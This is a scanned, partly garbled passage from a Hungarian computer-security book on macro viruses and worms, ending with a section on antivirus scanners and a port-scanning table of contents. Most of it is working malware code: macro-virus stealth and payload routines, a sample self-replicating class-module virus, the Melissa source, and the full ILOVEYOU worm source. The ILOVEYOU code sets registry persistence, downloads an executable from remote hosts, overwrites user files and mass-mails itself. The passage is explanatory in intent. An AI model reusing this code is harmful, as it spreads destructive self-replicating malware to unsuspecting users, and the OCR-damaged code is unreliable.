SubViewVBCode( ) On Error Resume Next End Sub A felhasználó nem tudja elindítani a VB editort. A vírus eltávolítja ezeket a bejegyzéseket. Options. amely egy 0-100 közti számot tartalmaz. A felhasználó nem láthatja a párbeszédmezőt. CommandBars("Tools").. Sub WordBasic. menj a Payloadra.dot-ot. VirusProtection = False Eltávolítja a vírusvédelmet. If Month(Now( )) = l And Day(Now( ) = l Then Call Payload 'Ha az aktuális dátum január 2. egy folyamatellenőrzési lehetőséggel is fel van ruházva. CommandBars(''Tools")."HKEY_CURRENT_USER\Software\ Microsoft\Office\9. ami megvalósítható néhány programsorral.PrivateProfileString("". Fontos még: mivel ennek a funkciónak a kikapcsolása a háttérben történik..Delete Kiveszi a sablonokra és a bővítményekre vonatkozó menüparancsokat. a következő paranccsal lehet kikapcsolni a Registry-ből. CommandBars(''Format"). „Levél") = /& A Programhiba esetén az On Error Resume Next -tel egyszerűen továbbfut. amely alapértelmezésben rákérdez a Normal. akkor menj a payloadra. . amelyekkel a Word a dokumentumokban előforduló makrókra reagál. így anélkül lehet megváltoztatni a Normal. A Word kérdését. azután nullánál megtörténik a gonoszkodás. lefut ez a sub.Controls(''Macro"). hogy a makrovírust elrejtjük.SaveNormalPrompt = False Ezzel a paranccsal kikapcsolja a párbeszédablakot. If x = 3 then Call Payload 'Ha x. "). Ehhez el kell helyezni egy kulcsot valahol a Registry-ben. hogy a makrókat lefuttassa-e. akkor következik be az esemény: x=Int(Rnd * 100) 'X egy változó. A megfelelő kódsorok egyszerű If lekérdezések.tehát azt jelentené. akkor menj a Payloadra. és sokkal tovább marad észrevétlen. Sub FileTemplates( ) On Error Ressume Next End Sub A felhasználó nem tudja elindítani a Sablonok és bővítmények ablakot.5 Ilyet is lehet: a vírus egy Payload-ot hív meg Hogy a vírus ne legyen azonnal aktív. A fertőzésszámláló pontosan ezt a lehetőséget kínálja.Delete Kiveszi a makrókra vonatkozó menüparancsokat. A rejtőzködéshez bizonyos menüparancsok kikapcsolása is fontos. If Month(Now( )) = l And Day(Now( ) = l Then Call Payload 'Ha az aktuális dátum január L. 5. hogy azt a felhasználó észrevenné. Ez úgy megy a legegyszerűbben. ").0\\Word\SecTírity".. ha nem lehet a menükből elindítani a megfelelő funkciókat. a hiányát csak az veszi észre. Options.. Természetesen a rendszeres összehasonlítás egy véletlenszámmal is lehetséges. Controls("Templates and Add-lns.DisableAutoMacros = 0 End Sub Az automakrók inaktívvá válnak.Delete * Kiveszi a stílusokra vonatkozó menüparancsokat. kattint.. Ezen a helyen a ritkán használt parancsok elrejtése a Word 2000-ben különösen végzetesen hat: a felhasználó e beállítás miatt egyáltalán nem vesz észre bizonyos beavatkozási lehetőségeket. Sub ToolsMacro( ) On Error Resume Next End Sub Ha a felhasználó az Eszközök/Makró/Makrók-ra. Ha a szám és a változó megegyeznek. Ugyanígy egy bizonyos napot is lehet használni. System.Controls(''Style. aki jól kiismeri magát a Wordben.dot mentésére.5.

Aki szeretne utánanézni. End Sub Ezentúl biztosan másképpen fogják kezelni a Word-figyelmeztetést.Execute").Replacement.Text = "Mire cseréli" 'amire cseréli . egyes vírusprogramozók sportot űznek abból. vagyis egy objektumot definiálunk tulajdonságokkal és eljárásokkal. A vírusvizsgálónk legyen mindig a legfrissebb.Comments = "Megjegyzések" .Execute End With End Sub Ugyanígy szavakat is kicserélhetünk Word parancsok segítségével.6 A vírus fájltulajdonságokat vagy szövegtartalmakat változtat meg A Payload mögött különféle ténykedések rejtőzhetnek. Az osztálymodulok a felhasználó számára nem olyan könnyen felismerhetők.Author = "Szerző" . Százszázalékos védelem nem létezik.Text = "Mit keres" 'a cserélendő szöveg .5. mint az eddig bemutatott makróvírusoké: itt már nem exportálnak és importálnak egy kódot minden jövendőbeli Word fájlba. és használjuk minden alkalommal.5.MatchAllWirdForms = False End With Selection.ReadOnlyRecommended = False With Dialogs(wdDialogFileSummaryInfo) . A víruskód ."). hanem beolvassák a kódot. ha az Eszközök/Makró/Makrók Szervezőre kattint. ami sokkal nehezebbé teszi a vírus felfedezését.Replacement. A kedvelt Keresés-Csere funkció most a vírust segíti: Sub Payload( ) On Error Resume Next Selection. és ezt a sztringet illesztik be egy másik osztálymodulba.Subject = "Tárgy" .MatchWholeWord = True . Az osztálymodulok megfertőzésének a stratégiája más.Wrap = wdFindContinue .Save End Sub 5. mint a vezérlőelemek. ").Find:ExecuteReplace:=wdReplaceAll CommandBars("edit").MatchCase = False . Az osztálymodulok ezért ugyanazokkal a tulajdonságokkal rendelkeznek.. Sajnos.Delete CommandBars(''edit"). amelyeket az időzített kioldó vált ki. hogy mindig új fertőzési módokat találjanak ki.5.Forward = True . úgy találja meg ezt a párbeszédablakot. mert a makrókhoz és sablontartalmakhoz tartozó Makró és a Szervező ablakban nem mutatja őket a program. de hatékony megelőzés azért lehetséges.7 A vírus jelszóval védi a fájlt A jelszavas védelmet is be lehet kapcsolni egy makrovírussal: Sub Payload( ) ActiveDocument. Az osztálymodulok abban különböznek a felhasználó által meghatározott vezérlőelemektől.Controls("Replace. hogy kvázi „láthatatlanok". vállalva a felfedezés veszélyét.Delete If ActiveDociment. 5.ClearFormatting With Selectíon..Format = False .HomeKey Unit:=wdStory Selection.Controls("UndoVBA-Find.Title="Cím" . amelyeknek magunk írhatjuk a forráskódját. Például megváltozhatnának a dokumentum-tulajdonságok: hirtelen egy Dagobert kacsa írta a levelet vagy ilyesmi: Sub Payload( ) ActiveDocument..Find .6 Megfertőzött osztálymodulok A WinWord dokumentumok megfertőzésének egy másik módja az osztálymodulok megfertőzése. ha kapunk egy Word vagy Excel dokumentumot.Controls("Repeat" Replace.Saved = False Then ActiveDocument.Password = "hallo" 'Persze lehet véletlenszerű jelszót is csinálni.Find..Delete CommandBars("edit").Keywords = "Keresőszó" . Az osztálymodulok bizonyos mértékig saját meghatározású vezérlőelemek.

hol vagyunk (a Normal. tudjuk.CountOflines) End With ' Ha egy objektumot egy With..End With-blokkba zárunk. ' Létrehozzuk a változóinkat. hogy hol vagyunk. . és hogy a víruskód a Normal. VBProject.dot-ból jön.CodeModule 'Ha a Normal. hogy már az aktuális dokumentum is ' fertőzött. End With Egy igazi vírus persze sokkal nagyobb ennél. és beírjuk a modulba. már csak egy lehetőség marad hátra Set Source = ActiveDocument. és csak a dokumentumban vagy a Normal. ' A Sub neve is megváltozott. With Target .dot" Then Set Source = NormalTemplate.CodeModule Set Target = NormalTemplate. amelyek előzőleg ott voltak.dot-ban lehet. sortól kezdve. amilyen hosszú a modul.. ' mert minden kód megfertőzésénél azok. .. . hogy a vírus végrehajtódik.VBComponents(l). VBComponents(1). On Error Resume Next ' a szokásos történet a hibával MyPos = ThisDoaiment.CountOflines) ' Most a teljes víruskód a VirCode-ba lesz beolvasva. hogy az aktuális dokumentumot kell ' megfertőzni. Most Document_Open( ) a neve..VBProject.Lines(az l. A kód beolvasásához tehát ki kell találni. sortól kezdve. . nem pedig ' AutoOpen( ). ' Az l.Name adja a választ If MyPos = „Normal. ' ActiveDocument. VBComponents(l).Lines(l. ' amelyet meg kell fertőzni.dot-ban vagyunk..CodeModule End If With Source VirCode = . VBProject.' Ezzel biztosak lehetünk abban. ' .CountOflines adja vissza a sorok/Lines számát a modulban.VBProject. VirCode ' A beolvasott sztring beillesztése a modulba.' annyi sort kell törölni. ' Figyelembe kell venni. CodeModule ' Az indexszám l a VBComponents(l)-nél mindig a „ThisDocument" osztálymodul.. hogy előzőleg törölnénk ' a sorokat. hogy mit kell megfertőzni. ezt az új felülírja.CodeModule Set Target = ActiveDocument. akkor nincs szükség ' az objektumnév ismétlésére. az hibaüzenethez vezetne.. Az 1.megnyitáskor láthatatlanul integrálódik minden további dokumentumba. hogy a SUB Priváté. amilyen hosszú a modul). ha egy dokumentumot megnyitnak.InsetLines l. Source. Egy osztálymodulban mindennek ' Private-nak kell lennie. sortól beolvasni. annak fertőzésnél azonnal hibát jelez.DeleteLines l. anélkül.CountOflines ' A megfertőzendő fájlban minden sort törölni kell. ' Tehát ott van.. Ha a vírus ott már . De lehetséges. hogy világossá tegye a mögötte rejlő meggondolásokat. íme egy példavírus. törölve ' lesznek.' megtalálható lenne. VBProject. Else ' ha nem a Normal. hogy ott már semmi sincs. abból azután már logikusan következik.VBComponents( l).VBComponents(1). ' hogy ha ott egy másik vírus volt. hogy Source. kommentárokkal a kódban.dot-ban vagyunk. Ez azonban azt is jelenti. ' Source. Ha ezt valaki elfelejti..dot-ban vagy a dokumentumban) 'a ThisDocument.Name ' Mivel nem tudjuk. Így ez csak elpazarolt processzoridő. Ezt ebben a példában nem ellenőrizzük. A programozás stuktúrájához egyszerűen azt kell elképzelni. és VirCode a sztring.. és még Stealth-funkciókat is tartalmaz. Private Sub Document_Open( ) ' Ez a Sub mindig lefut. ..Lines(l. . annyi sort.

ActiveDocumentName.Item(l) -re.Lines(1. NTCL SetToInfect = NTIl NTILName = "Melissa" DoNT = True End If If DoNT <> True And DoAD <> True Then GoTo CYA If DoNT = True Then Do WhileADIl.Lines(BGN.CodeModule.CodeModule.VBProject.FullName Elself (InStr(l. VBComponents.CodeMOdule.Lines(BGN.Item(l)-re. ADCL SetToInfect = ADIl ADILName = "Melissa" DoAD = True End If If NTILName <> "Melissa" Then If NTCL >0 Then _ NTIl. 1) = "" NTIl.AddFromString ("Private Sub Document_Close( )") End If CYA: Do While ADIl.Lines(BGN. ADIl.Item(l) 'Állítsd SetNTIl-et NormalTemplate. NTCL = Hni. VBProject.SaveAsFileName:=ActiveDocument.VBComponents. .CountOfLines BGN =2 If ADILName <> "Melissa" Then IfADCL>OThen_ ADIl. A LoveLettert először 2000.CodeModule. 1) BGN = BGN + l Loop End If If DoAD = True Then Do While NTIl. 1) <> "" ToInfectCodeModule.AddFromString ("Private Sub Document_Open( )") Do While NTIl. 1) BGN = BGN +l Loop If NTCL <> 0 And ADCL = 0 And (InStr(l. ActiveDocumentName.CodeModule. 1) <> "" ToInfect.Lines(BGN.CodeModule.CodeModule.DeleteLines l.NTIl.CodeModule.Item(l) 'Állítsd ADIl-et ActiveDocument.CodeModide-. május 4-én jelezték. "Document") = False) Then ActiveDocument.VBProject.CodeModule.DeleteLines l.CodeModule.Lines(1.Saved = True End If End Sub CUT HERE 5.VBProject. 1) ="" ADIl. mellékletként.VBComponents. és a hálóra csatlakoztatott cégek 90% -át megfertőzte.CountOfLims ADCL = ADIl. „Document") <> False) Then ActiveDocument.VBComponents.Lines Loop ToInfect.CodeModule.CodeModule. Set NTI1 NormalTemplate.7 ILOVEYOU A LoveLetter egy VBS-féreg (Vimal Basic Script) amely e-mailen keresztül terjed.InsertLines EGN.InsertLines BGN.Az alábbiakban egy példával világítjuk meg. hogyan fertőzi meg az osztálymodulatokat a Melissa: CUT HERE Priváté Sub Document_Open( ) On Error Resume Next Set ASI1 = ActiveDocument. Néhány órán belül világszerte elterjedt.DeleteLines l Loop ToInfect.CodeModule. Most minden idők egyik legveszélyesebb vírusát fogjuk alaposabban szemügyre venni.CodeModule.

hogy részt vettek a Bárok 2.jpg fájlt használhatatlanná tett.5. amelyek között ott volt a fertőzött is. ezzel az üzenettel: Bárok..1 Mi az a féreg? A féreg egy darabkányi kód. A féreg manipulálta még a következő Registry-bejegyzéseket: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run \MSKernel32 HKEY_LOCAL_MACHINE\Sofrware\Microsoft\Windows\CurrentVersion\Run Services\Win32DLL HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run \WN-BUGSFIX Miután lefuttatták. .send.css.sct. és törölte a webhelyet.er. Ebben az esetben gyorsan be kellett zárni ezt a feladatot. aminek következtében néhány céges hálózatnak teljes egészében le kellett mondania a mailküldésről.jse. Így nagy forgalom keletkezett a cégek belső hálózati mailszerverein. Az eddig ismert változatok: • ILOVEYOU • Susitikim shi vakara kavos puodukui. A féreg. mivel ezekbe a statisztikákba nem kerülnek be a magánfelhasználók gépei. A károkat több milliárd dollárra becsülték. legfeljebb magas forgalmat (traffic) generál. a nem hivatalos számok azonban ennél jóval magasabbak. Sok cég megelőzésképpen leválasztotta mailszerverét a netről. Ugyanott a féreg a WIN-BUGSFIX programot is le akarta tölteni.. . A vírussal ellentétben a féreg nem közvetlenül rombol. a rendszergazdák félelmeit és feldühítését még egyáltalán nem számoltuk. ... automatikusan elküldte magát a címjegyzék e-mailcímeire. • LOOK! • How to protect yourself from the ILOVEYOU bug! Az Amable Mendoza Aguila Computer College-ben. mint az ILOVEYOU esetében.vbs fájlt. illetve elrejtette az . • Joke • Mothers Day Order Confirmation • Dangerous Virus Warning • Vírus ALERT!!! • Important! Read carefully!! • I Cant Believe This!!! • Thank You For Flying With Arab Airlines • Variant Test • Yeah. . a Taskmanager-en is megjelent mint w_srcipt.hta. A féreg. .wsh.jpeg. . gyorsan kapcsolt.mp2 fájlokat. . hivatalos számok szerint.vbs. hogy minden döntő bizonyítékot töröljenek a gépeikről. amelyeket azonban hamarosan nem lehetett elérni.ini fájlját. s ez az érintett szerverek tisztán materiális kiesési ideje. a Sky Internet Inc.mail. vagy a gépet is rögtön kilőni! A féregnek egy variánsa aktiválta a jelszó cache-elést...trajan-by spyder. a Spyder nevet használó hacker munkahelyén 10 személyt gyanúsítottak azzal.. .1 szoftver fejlesztésében. hogy minden js. Yeah another time to DEATH. Két prominens áldozat is volt: a ZDF tévéadó és az Expo-világkiállítás.7. megkapta a . Úgy módosította a mIRC script. A féreg az Outlookon és a mIRC-en keresztül is terjedt. .2 A működési mód Az ILOVEYOU féreg egy weboldalról töltött le egyes bannereket. hogy egy csatorna minden látogatója. A legdestruktívabb azonban az a tény volt. és ezeket Access Net accountokra kellett volna küldenie.mp3 és az . míg a hatóságok napokon át semmit sem tettek. 5. és ezután a cache-elt jelszavakat elküldte mailben. mivel a Fülöp-szigetek-i szolgáltató.e.7. 600 ezer számítógépet ért el.passwords. Időközben a hackereknek volt idejük. amely jelszavakat kémlel ki. Miközben a féreg aktív volt. amely magától terjed az interneten vagy a helyi hálózaton keresztül.

rr setivscr=CreateObject("Wscript. hibaüzenet nélkül. de hangsúlyozzuk. ha minden végfelhasználó tudott volna a Visual Basic Script veszélyeiről. A vírus a Windows Scripting Host-tal hajtódik végre.7. hogy manapság. Sokan azt hitték.7. Open TextFile (Wscript.TXT.dow eq="" ctr=0 .vbscopy. hogy ebben a formájában teljesen hatástalan.dirsystem.Copy(dirwin& "\Win32DLL.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU. a vírus működésére nincs semmilyen hatásuk.dirtemp.COM fájlok jelenthetnek veszélyt. Ezzel az objektummal lehet fájlokat elérni.FileSystemObject") set file = f s o .vbs") c. On Error Resume Next dimFSO. Az ILOVEYOU vírus téma a múltban nagyon gyakran szerepelt a médiában.Shell") rr=scr.ctr.kommentárokkal A továbbiakban az ILOVEYOU vírus forráskódja látható.vbs") c. főleg az internetes újoncokban. Ellenintézkedésként ajánlkozik a WindowsScripting hostok eltávolítása uninstall-lal.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout". rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail. tehát a szerző mailcíme és álneve. hogy csak a végrehajtható fájlok. Ennek a féregnek semmi esélye sem lett volna.GetSpecialFolder(0) Set dirsystem =fso.file. még nem ismert általánosan.GetSpecialFolder(2) Set c =fso. nem tudatosulnak a hálóval kapcsolatos veszélyek. és a Registry-bejegyzések eltávolítása.ScriptFullName) c. mint az .0. Az On Error Resume Next-tel a hibakezelést vezeti be: ha a program futtatása közben hiba lép fel. Copy(dirsystem& "\MSKernel32. A következő sorban ez meg is történik: a program az OpenTextFile-lal és az azután következő ReadAll( ) -lal beolvassa magát a memóriába. main( ) sub main( ) On Error Resume Next dim Tvscr. ScriptFullname. hogy ActiveX-kontrollok és más scriptek is veszélyesek lehetnek.vbs fájlok törlése a Windows és a Windows/System könyvtárból. ezekkel a változókkal fog a későbbiekben dolgozni. A célja csak a felépítés bemutatása és kommentálása sorról sorra.Az eset egyedüli nyertesei az antivírusok gyártói voltak. nemhogy egy analízis háttérinformációkkal a felhasználók számára.3 Hogyan tudott a féreg elterjedni? A féreg terjedésének az alapja az volt.com / ©GRAMMERSoft Group / Manila.ReadAH A program ezután egy FileSystemObject-et (fso) hoz létre.GetSpecialFolder(l) Set dirtemp = fso. 1) vbscopy=file. Set so = CreateObject("Scripting. Ezután definiál néhány változót.eq. 5. akkor a következő lépéssel kell folytatni.4 A forrás . de sehol nem jelent meg róla még felvilágosítás.dirwin.Philippines Ezek a sorok csak szerzői kommentárok.GetFile(Wscript. akiknek a részvényei 10%-kal is emelkedtek. Az. valamint a *.Regread(''HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptingHost\Settings\Timeout") if (rr>=l) then wscr. "REG_DWORD" end if Set dirwin = fso.EXE vagy a .vbs") regruns( ) html( ) spreadtoemail( ) listadriv( ) end sub 5.

vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion \RunServices\Win32DLL ". amely valójában még egyszer tartalmazza a vírust. ami később meg is történik. és írni lehet bele.Innentől kezdődik a vírus főrutinja. Mikor a vírus így bemásolta magát. . Ki lehet például olvasni a Registry-t. és ezt indításkor végrehajtja.net/ ~angelcat/skladjflfdjghKJnmtryDGFikjUlyqwrWe546786324hjk4jnHH GbvbmKL/ JKjhkqj3w/ WIN-BUGSFIX. Ezek a fájlok tehát kizárólag a vírust tartalmazzák.exe" elseif num = 3 then regcreate "HKCU\Sofrivare\Microsoft\InternetExplorer\Main\Sart Page". html( ).vbs.downread& "\WIN-BUGSFIX. spreadtoemail( ) és listadriv( ).vbs" downread="" downread=regget("HKEY_CURRENT_USER\Software\Microsoft\ Internet Explorer\Download Directory") if (downread="") then downread="c:" en if if<fíleexist(dirsystem&"\WinFAT32. a működési módjukkal együtt. Win32DLL.dirsystem&"\MSKernel32.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main \Sart "about:blank" end if end sub A regruns( ) funkciónak különböző feladatai vannak a Registry-ben.downread regcreate "HKEY__LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion \Run \MsKernel32 ". valamint a Windows/System (dirsystem) könyvtárat. A html( ) egy helyi HTML-fájlt helyez el. amihez a következő függvényeket hívja meg: regruns( ).vbs.dirwin8í "\Win32DLL.skyinet. hozzákezd az igazi feladatához. sub regruns( ) On Error Resume Next Dim num.exe")=l) then Randomize num = Int((4 * Rnd) +1 if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Sart Page ". Először a CreateObject( ) -tel egy Shell objektumot hoz létre . mindkettő a vírus előzőleg létrehozott másolatára mutat.net/ ~koichi/jf6TrjkcbGRpGqaql98vbFV5hfFEjbopBdQZnmpOhfgER61b3Vlrvg/ WN-BUGSFIX. "http://www. net/ ~yotmg l s/HJKjnwerhjkxcvytwertnMTFwerdsfmhPnjw6581345gvsdfl619njbvYT/ WIN-BUGSFIX.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Sart Page ".exe elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Sart Page". A többi funkciót a forrásszöveg folyamatában magyarázzuk el. Page". A Set parancsokkal kérdezi le a program a Windows könyvtárait (dirwin).vbs.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run \ WIN-BUGSFIX". MSKernel és Win32DLL név alatt.skyinet.ez az objektum teszi lehetővé a Windows különböző funkcióinak az elérését.skyinet.TXT.exe end if end if if (fileexist(dovmread&"\WIN-BUGSFIX. hogy azután a maga egyik másolatát tegye le a következő neveken: MSKernel32. illetve LOVE-LETTER-FOR-YOU. "http://www. A CurrentVersion/Run alatt két kulcsot hoz létre.skyinet. net/~chu/ sdgfhjksdfiklNBmnfgkKLHjkq'wtiiHJBhAFSDGjkhYUgq'werasdjh PhjasfdglkNBhbq'webmznxcbvnmadshfgq'w23146I234iiiylthjg/ WIN-BUGSFIX. "http://www. "http://www.

és újból kezdi a működését. amelyet meg fog fertőzni: sub infectfiles(folderspec) On Error Resume Next dim f. amelybe a megfelelő fájlokat tölti az Internet Explorer.copy(f1.2.vbs") fso. hogy a következő Windows-indításnál végrehajtódik.DeleteFile(f1.patb&"") end if Next listadriv = s end sub Ez a függvény minden meghajtót kilistáz.copy(folderspec& ""&bname& ". fc.s Set dc =fso.path) set cop=fso.path&".vbs") mp3. úgy.path.path) elseif(ext="jpg") or (ext="jpegn) then set ap=fso.write vbscopy mp3.path) cop.dc.GetFile(f0. 2. Ez azt jelenti. ehhez négy különböző oldal szolgál választékul.OpenTextFile(f1.write vbscopy ap. s.CreateTextFile(f1. hogy a következő rendszerindításkor a vírus ismét elindul.path. sf for each f1 in sf set f=fso. sub folderlist(folderspec) On Error Resume Next Minden mappán végrehajtja az InfectFiles funkciót.A Run alatti bejegyzések a Windows indításakor automatikusan lefutnak. tehát azt a könyvtárat.OpenTextFile(f0). Minden oldal a skyinet.path) ext=Icase(ext) s=Icase(f( ). GetExtensionName (f1 . sub listadriv On Error Resume Next Dim d. true) ap. ext.close dim f.DriveType=3 Then folderlist(d. Erről az oldalról azután még egy további fájlt is automatikusan letölt a vírus. bname. OpenTextFile(f1. és ezután meghívja a folderlist függvényt. Most a program megváltoztatja az Internet Explorer kezdőlapját.net egyik szerverére vezet. ez a fájl megintcsak bejegyzi magát a Registry-be.path) folderlist(f1. ap.close elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (Ext="sct") or (ext="hta") then set ap=fso.close set cop=fso. GetFolder(folderspec) set sf=f.write vbscopy ap. f1. GetFolder(folderspec) set fc =f.GetBaseName (f1. mircfname.DriveType = 2 or d. Röviddel az ILOVEYOU megjelenése után azonban a skyinet. Minden fájlt felsorol. amelyek közül véletlenszerűen választ ki egyet. s hogy pontosan mit is tesz.vbs") fso.path) elseif(ext="mp3" ) or (ext="mp2") then setmp3=fso.close bname=fso. Ezután a vírus az Internet cache-t keresi.true) ap.path) cop.FetFile(f1.net lépett. mp3 set f=fso. 2. egyszerűen a C:-t használja. és eltávolította a szerverről a megfelelő oldalakat. amely a meghajtókon található minden mappát megdolgozza. Ez a funkció a mappák egyes fájljait szerkeszti.Drives For Each d in de If d.write vbscopy ap.Files for each f1 in fc ext=fso.path. az majd később következik.DeleteFile(f( ). Ha a vírus nem talál cache-t. f1.path) next end sub . true) ap.SubFolders infectfiles(f1.path&".name) if (ext="vbs") or (ext="vbe") then set ap=fso. s támogatja a vírus működését.

és a saját magáról készített másolattal írja felül ezeket.Shell") regget=regedit.regv. . ha lefut. Ha talál egy mIRC-et (Chat Scriptet). com " script. if mIRCwill" script.ini.b..WriteLine "n3=}" script.ini.ini.ini.WriteLine " n 1 = / i f ( = = ) {halt}" script. 2.ini.ini") script. mIRC will corrupt.) fájlt. Please dont edit this script.ctrlists. mirc. sub regcreate(regkey.CreateTextFile(folderspec& "\script.WriteLine "n0=on 1:JOIN:#:{„ script.regad .set att=fso. Megkeres minden.a.ctrentries. GetFolderExist(folderspec)) then msg = 0 else msg = l end if fileexist = msg end funrtion sub spreadtoemail( ) On Error Resume Next dimx.exe") or (s="mirc.regvalue end sub function regget(value) Set regedit = CreateObject("Wscript. hogy egy LOVE_LETTER_FOR_ YOU.path) att. ugyancsak a vírust terjeszti úgy.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso. Ez a script. akkor felülírja a script.WriteLine ".ini. WriteLine " corrupt.ini.mIRCScript" script.wsh..ini-t. .malead.dcc send "&dirsystem&\LOVE_LETTER_FOR_YOU.HTM" script.ini") or (s="mirc.Shell") regedit.css stb.KhaledMardam-Bey" script.hlp") then set scriptini=fso. amelyeket a program más pontjain használ fel.ini.ini. WriteLine ".WriteLine "n2= /..ini") or (s="script.FileExist(filespec)) Then msg = 0 else msg = 1 end if fileexist = msg end function function folderexist(folderspec) On Error Resume Next dim msg if ( f s o . thanks" script.WriteLine ".js.RegWrite regkey.WriteLine ".ini.ini. és ellenőrzik." script.http://www." script.exe") or (s="mlink32.WriteLine ".close eq=folderspec end if end if next end sub Az InfectFiles -nak két feladata van. A következő függvények segédfüggvények.attrihites=att.attributes+2 end if if (eq<>folderspec) then if (s="mirc32. WINDOWS will affect and will not run correctly.ini.WriteLine "[script] script.HTM nevű fájlt küld a csatorna minden felhasználójának.regedit. 1. Ezek a függvények egy Registry-bejegyzést készítenek.. hogy léteznek-e bizonyos fájlok vagy mappák. megadott kiterjesztésű (.WriteLine ".ini.GetFik(f1.regualue) Set regedit = CreateObject("Wscript.

amely minden felismerhető vírus nevét és lenyomatát tartalmazza. hogy azután a címjegyzékben talált minden címre elküldje a vírus másolatát. hogy megállapítsa a víruskódokkal való egyezést. tehát a címjegyzéket (WAB. ehhez a szoftver gyártói saját víruslaborokat tartanak fenn. AddressEntries. vbs") male.Count set a=mapi.Body =vbcrlf&"kindly check the attached LOVELETTER comingfrom me. csak különböző script-fáljokat írt át. amelyet a felhasználóknál hátrahagyott. amit talál.AddressEntries.Subject = "ILOVEYOU" male.a. TXT.EXE). A legtöbb vírusvizsgáló frissítésekkel folyamatosan bővíti az adatbázisát.Sheir) set out=WScript. igazán komplex funkciókkal van felszerelve.Recipients." male. Csak ezért tudott ennyire gyorsan elterjedni. Count>inr(regv)) then for ctrentries=l to a. az ILOVEYOU. amelyben a Windows minden mailcímet tárol.Add(malead) male. A kár. és ezzel potenciálisan olyan vírusokat is leleplezhet.1 Szkennermodul A szkennermodul a vírusok felkutatásáért felelős a merevlemezen. mint a normál víruskeresésnél.Add(dirsystem& "\LOVE-LETTER-FOR-YOU. Az eljárás neve Pattern Matching. Az ilyen szkennelésnél a hibaszázalék magasabb. Ha a szkenner megváltoztatott kódot vagy valamilyen egyéb eltérést észlel.Application ") set mapi=out.Attachments. az egyszerűsége ellenére. A szkennermodul a vírusok sztringjeit és viselkedési módját is felismeri.AddressLists. Ez a program tulajdonképpeni terjedési módja: lefut. 1.8 Hogyan működnek a vírusvizsgálók? A vírusvizsgáló egy adatbázist használ. és látogatják az idevágó newsgroupokat.RegRead("HKEY_CURRENT_USER\Software\ Microsoft\WAB"&malead) if(regad="") then set male=out. A szkenner ellenőrzi egy fájl vagy egy program kódját.a feldolgozhatatlan mennyiségű e-mail miatt milliós volt.AddressEntries(x) regad="" regad=regedit.RegRead(''HKEY_CURRENT_USER\Software\Microsoft\ WAB"&a) if(regv="") then regv=l end if if (int(a.AddressEntries. Amint látjuk. amelyek még nincsenek benne az adatbázisban.AddressLisets(ctrlists) regv=regedit. Count endif next x=l Set out=Nothing Set mapi=Nothing end sub A SpreadToEmail( ) függvény megnyitja a programot. GetNameSpace("MAPI") for ctrlists=1 ro mapi.Createltem(0) male. CreateObject("Outlook. és elküldi magát minden címre. 5.setregedit=CreateObject("Wscript.RegWrite "HKEY_CURRENT_USER \Software \Microsoft\WAB"&malead. illetve mailszolgáltatók kára viszont . úgynevezett nyomozócsapatokat foglalkoztatnak. . "REG_DWORD" endif x=x+l next regedit.Send regedit.8. hogy folyamatosan tudjanak reagálni az új fenyegetésekre.Count malead=a. akkor ezt összehasonlítja az adatbázis lenyomataival. többnyire csekély.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB"&:a. Az internet-. 5.

jelentést tesz. az attól függ. és ha szükséges. különböző opciói vannak a vírus eltávolítására.8.8. ez a modul lép akcióba. vagy törli a fájlt. hogy milyen nagy a fertőzés kockázata.4 A vírusvédő program kiválasztásának a szempontjai Hogy mennyit akarunk vagy kell ráfordítanunk egy-egy virusvizsgálóra. kijelölnek. 5. vagy feleslegesen bonyolult? . ha nincs rá lehetősége. és mennyibe kerülne az adatok újbóli előállítása.5. Ha egy fájlt elindítanak. A következő szempontokra kell ügyelni: • A kínált programfrissítési gyakoriság (legjobb hetente egyszer) • Az ügyféltámogatás minősége • Szkennelési sebesség • Szkennelési minőség • Lehetséges-e a szkennelés a háttérben.3 „Fertőtlenítő" Ha a szkenner vírust talál. vagy elkülöníti. azaz áthelyezi egy „karanténkönyvtárba". Ennek a modulnak. hogy a vírusprogramtól függő mértékben visszafogja a rendszerteljesítményt. 5. a fertőzéstől függően. A hátránya. folyamatosan kövesse a felhasználók minden fájlelérését. Úgy van beállítva.8. Vagy megtisztítja a fájlt a vírustól. hogy valamiképpen megtisztítsa. a háttérben működő szkenmodul. átnevezik vagy letöltik a hálóról. a víruspajzs azonnal megvizsgálja. hogy valós időben. vagy a szkennelés leállítja a rendszert? • Felismeri-e a program a vírusokat már letöltés közben? • Meg tudja-e találni a szoftver tömörített fájlokban is a vírusokat? • Tudja-e ellenőrizni az e-mailhez csatolt fájlokat (attachments) már az elindításuk előtt? A kezelése kényelmes.2 Víruspajzs A víruspajzs egy memóriarezidens.

2.4 Fragmentált szkennelés 6.1.2.Tartalom 6. A szkenner Szkennelesi eljárások 6.2 Félig nyitott TCP-szkennelés 6. 6.1 Szkenneles teljes TCP-kapcsolattal 6.2.7 ICMP-echo-scanning/ping-szkennelés 6.9 A portszkennelés elleni védelem . fejezet .2.2.2.6 UDP-Recvfrom-And-Write szkennelés 6.8 A nyitott portok csak a kezdetet jelentik 6.3 TCP-FIN-Scan 6.5 UDP-ICMP-Port-Unreachable szkennelés 6.6.2.2.2.2.

